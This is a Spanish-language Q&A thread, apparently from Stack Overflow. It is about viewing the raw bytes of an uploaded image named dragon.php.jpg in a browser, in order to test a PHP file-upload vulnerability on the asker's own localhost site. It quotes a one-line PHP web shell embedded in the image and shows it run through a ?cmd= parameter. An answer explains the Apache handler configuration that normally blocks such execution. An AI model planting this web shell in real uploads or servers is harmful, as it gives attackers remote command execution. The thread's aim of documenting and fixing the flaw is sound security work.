# Como ver codigo fuente / RAW de una imagen en navegador web

Tags: php, html, imagen, extensiones, código-fuente

Principalmente me gustaría saber como poder ver el código fuente de una imagen en un navegador web.

Tengo una web donde pido al usuario que se suba una imagen para posteriormente mostrarla.

[image: Ejemplo :]

Como vemos en este caso tengo la carta llamada `324`. Lo que ahora quiero hacer sobre esta imagen es dirigirme a su ruta para visualizarla independientemente (lo cuál veo desde el código fuenta de la página)

Ruta independiente de la carta 324 : `http://localhost/M9%20-%20Cartas%20Rol/uploadedImages/dragon.php.jpg`

Ahora, una vez aquí me gustaría ver el código fuente / RAW de la imagen presionando Ctrl + U. El problema es que no se visualiza el código fuente y la opción Ctr + U esta bloqueada.

**Output**
[image: Vista de la imagen]

**Output esperado si se pudiera presionar Ctrl + U o con otra forma :**
Aquí tendría que visualizar el código fuente / RAW de la imagen

Ejemplo del código fuente de una imagen :

```
@�i�D�!H@�tc�$�l��WӺ���( ̱�䋤@ⷠ�@MQ�GX1�R��Ha+=^��#i��8.�KGh9}���▒���R▒�mJ>�y�Ĭ_���nRR��
                                                                                      L�~'P��cA���έ���⤀�:�� +�Ȁ�!�.�\Dy�w�
�2 +�u��@W�^C�]��
                 �
�b��d@W��x��"��X��p�:�� +�Ȁ�!�.�\D�/(�7�;[("t&��X��Փ�Ƽ=ų���P���_�(��b�
oF`:�JI��1G����2��emU���ϕu�%�@Z��ڜ�P8�7`�5�D9�D� &K*    *K��z�Zn��:
M E&}+r�d�K��(
              ��A.���m�▒�� *�A���֯XL�tS,��p^�(�Q�$uz���9*
                                                        �*��l�Q�3M�Ōc25?;-��7FV�*һW�tr�Y/���gҲ���I�M#?Zn<v�&Qb:�dȁ�;�wӳ�,���'�M�cґI��O�Yb2�c� �2/,��3s��S?T�زVm�����jUJ4
                                           m#]E�2�2�9�/l��Ѻ�=��̡�ݏ¥�[�-��$�bĩ��>J�v2�*NSu�bxG���M���)ϧ:���f������5f�����NIUj-&�i�HӲ�,�<��]l��i��k<����4���$Ҩ�4����/�Zj=:e=c�����g���w▒���Z����K�$�UU�sW]^٫6������ګe�Qf޶�:�N��lfi0p��2����'�V�K�82��K��%�y]F!�8æ�:�F��?E���\YRp�f���Į��>rv�(�Hhn�h�ѥ�ވwE��"�w�֋�0a�D�ڣ麊�_�������%���7ki▒?AR�]4�e`�k+���r�f�X�En������H�헴UN��?�94�d��s.oƩ=)ʸ6�ZVcg��t$2����W��Fm�f���VwK"�"zN��i+>�#-OKâ
```

Me vendría muy bien una respuesta a esto, es importante! Gracias!

**Utilidad de visualizar código fuente**

Como vemos anteriormente, la imagen a la que se quiere ver el código fuente dispone de una extensión `.php.jpg`. Esto permite modificar el código fuente de la imagen (Carácteres en el bloque de código anterior) permitiendo inyectar código malicioso php.

En este caso, la imagen presentada anteriormente a ver el código fuente ha sido alterada en código fuente inyectando el siguiente código php :

`<?php system($_GET['cmd']);?>`

```
@�i�D�!H@�tc�$�l��WӺ���( ̱�䋤@ⷠ�@MQ�GX1�R��Ha+=^��#i��8.�KGh9}���▒���R▒�mJ>�y�Ĭ_���nRR��
<?php system($_GET['cmd']);?>                                                                              L�~'P��cA���έ���⤀�:�� +�Ȁ�!�.�\Dy�w�
�2 +�u��@W�^C�]��
                 �
�b��d@W��x��"��X��p�:�� +�Ȁ�!�.�\D�/(�7�;[("t&��X��Փ�Ƽ=ų���P���_�(��b�
oF`:�JI��1G����2��emU���ϕu�%�@Z��ڜ�P8�7`�5�D9�D� &K*    *K��z�Zn��:
M E&}+r�d�K��(
              ��A.���m�▒�� *�A���֯XL�tS,��p^�(�Q�$uz���9*
j-&�i�HӲ�,�<��]l��i��k<����4���$Ҩ�4����/
```

Este código implementado en el código de la imagen permite que al acceder a su ruta independiente mencionada anteriormente :
`http://localhost/M9%20-%20Cartas%20Rol/uploadedImages/dragon.php.jpg`

Se pueda aplicar una ejecucción remota de comandos a la parte del servidor que gestiona la web. Esta ejecucción remota de comandos se llama indicando un valor al $_GET['cmd'] anterior de la siguiente forma :

`http://localhost/M9%20-%20Cartas%20Rol/uploadedImages/dragon.php.jpg?cmd=COMANDO`

Ahora bien, la finalidad de visualizar el código fuente una vez ejecutado la inyección del comando utilizando `[PATH][IMG]?cmd=COMANDO` es que el resultado del comando inyectado se visualiza de nuevo en el código fuente de la imagen.

**Ejemplo**
`http://localhost/M9%20-%20Cartas%20Rol/uploadedImages/dragon.php.jpg?cmd=whoami`

Visualizamos el código fuente con el resultado :

```
@�i�D�!H@�tc�$�l��WӺ���( ̱�䋤@ⷠ�@MQ�GX1�R��Ha+=^��#i��8.�KGh9}���▒���R▒�mJ>�y�Ĭ_���nRR��
www-data                                                                            L�~'P��cA���έ���⤀�:�� +�Ȁ�!�.�\Dy�w�
�2 +�u��@W�^C�]��
                 �
�b��d@W��x��"��X��p�:�� +�Ȁ�!�.�\D�/(�7�;[("t&��X��Փ�Ƽ=ų���P���_�(��b�
oF`:�JI��1G����2��emU���ϕu�%�@Z��ڜ�P8�7`�5�D9�D� &K*    *K��z�Zn��:
M E&}+r�d�K��(
              ��A.���m�▒�� *�A���֯XL�tS,��p^�(�Q�$uz���9*
j-&�i�HӲ�,�<��]l��i��k<����4���$Ҩ�4����/
```

**NOTA :** Estoy completamente seguro de que el código fuente se puede visualizar. El fin de esta pregunta es prevenir comandos remotos y posibles shells inversas utilizando netcat. Gracias !

Comment: Cualquier duda o aclaración estaré constantemente revisando la pregunta. Gracias!

Comment: ¿Qué utilidad tiene para ti ver el *código fuente* de la imagen? Lo que enlazas en la pregunta es simplemente la representación en cadena (String) de los datos binarios que componen la imagen. ¿Qué información útil se puede sacar de dicha representación?

Comment: @MauricioContreras Si te fijas la extensión de la imagen es `.php.jpg`. La utilidad que tiene para mi ver el codigo fuente de la imagen es comprobar que existe una vulnerabilidad de comandos remotos mediante inyección php en la imagen. Ahora actualizo la pregunta para que quede claro y no se haga un comentario demasiado largo

Comment: @MauricioContreras Pregunta actualizada ! Espero que la finalidad haya quedado clara. De todas formas cualquier duda con lo explicado escribir otro comentario. Gracias !

Comment: Para comprobar si tienes RCE, puedes ponerte en escucha de trazas ICMP desde el lado del atacante con tcpdump, y el comando a probar sería un simple ping a tu IP. Si recibes un paquete comprobarías que es vulnerable.

Comment: Prácticamente estas pidiendo la creación de la vulnerabilidad.

Comment: @Sal No estoy pidiendo la creación de la vulnerabilidad. Lo que formulo en esta pregunta es que soy conocedor de esta vulnerabilidad y ya he visto casos donde se han realizado ataques mediante este uso. Lo que busco es realizar la vulnerabilidad para documentar su falla y solucionarla ... Vuelvo a repetir que ya he visto vulneraciones utilizando este metodo.........

Comment: @Sal Por esta misma razon no habia introducido cual era la finalidad de la pregunta en la primera formulación de esta. Además, pienso que nos estamos desviando del tema principal y se esta enfocando la pregunta en la vulneración cuando el motivo principal de la pregunta es como acceder al código fuente de la imagen mediante el navegador web. Donde vuelvo a repetir que ya he visto a personas acceder al código fuente de la imagen mediante un navegador web pero el problema es que yo no puedo hacerlo presionado Ctrl + U....

Comment: En condiciones  normales, un archivo con extensión `.jpg` no puede ser ejecutado por PHP (ni otro lenguaje), a menos que tengas una configuración específica en el servidor o que tu proyecto sea el causante de esa vulnerabilidad.

Comment: en chrome: abriendo la url de la imagen ( en este caso https://i.stack.imgur.com/SHpXU.jpg ) y con el inspector abierto ver [le tab sources](https://i.stack.imgur.com/8wtzZ.png), en otros navegadores por lo general hay una opcion de boton derecho, copiar el request/response como [raw/curl y verlo en la consola](https://i.stack.imgur.com/Km7Ek.png)

Answer (score 1, accepted):

Parece que en Chrome puedes verlo fácilmente, tal como comenta @aloMalbarez; para hacerlo en otros navegadores, como Firefox, tal vez tengas que instalar una extensión.

O puedes agregar un Javascript en tu sitio, visible solo para el administrador, donde realices una petición AJAX para obtener el código de la imagen:

```js
let image = document.querySelector('#image');
let code = document.querySelector('code');

document.querySelector('#btn').addEventListener('click', e => {
    // Petición AJAX para leer imagen en Javascript
    fetch(image.src)
        .then(resp => resp.text())
        .then(data => {
            // Ver código de imagen
            code.innerText = data;
        })
        .catch(e => console.log(e));
});
```

```css
#code {
    display: block;
    border: 1px #aaa solid;
}
```

```html
<img src="https://source.unsplash.com/user/c_v_r/100x100" id="image">
<button id="btn">Obtener código</button>
<code id="code"></code>
```

### Posible vulnerabilidad en el servidor

Para que ese archivo `dragon.php.jpg` pueda ser ejecutado por el intérprete de PHP, sería necesario que haya un error en la configuración; supongamos que tienes PHP instalado como módulo de Apache. El archivo de configuración tendrá algo como:

```
<FilesMatch ".+\.ph(ar|p|tml)$">
    SetHandler application/x-httpd-php
</FilesMatch>
```

Esa directiva asigna solo las siguientes extensiones para ser interpretadas por PHP:

```
.phar
.php
.phtml
```

Entonces, para que esa vulnerabilidad sea viable por configuración, tendrías que modificar la expresión regular, por ejemplo, eliminando el caracter `$`, que significa fin de línea, haciendo que pueda haber más contenido después de la extensión buscada.

### Vulnerabilidad en la aplicación

De acuerdo al punto anterior, la única posibilidad que queda para que PHP interprete y ejecute ese archivo es que lo hagas desde tu aplicación, ya sea con `include` o `require`, pero..., ¿quién en su sano juicio ejecutaría un archivo subido por usuario y/o con extensión diferente de `.php`?

### Otras posibilidades

Aparte de esto, un mal manejo de subida de archivos también implica riesgos de seguridad, ya sea por no verificar la extensión o contenido del archivo, pero eso es tema aparte.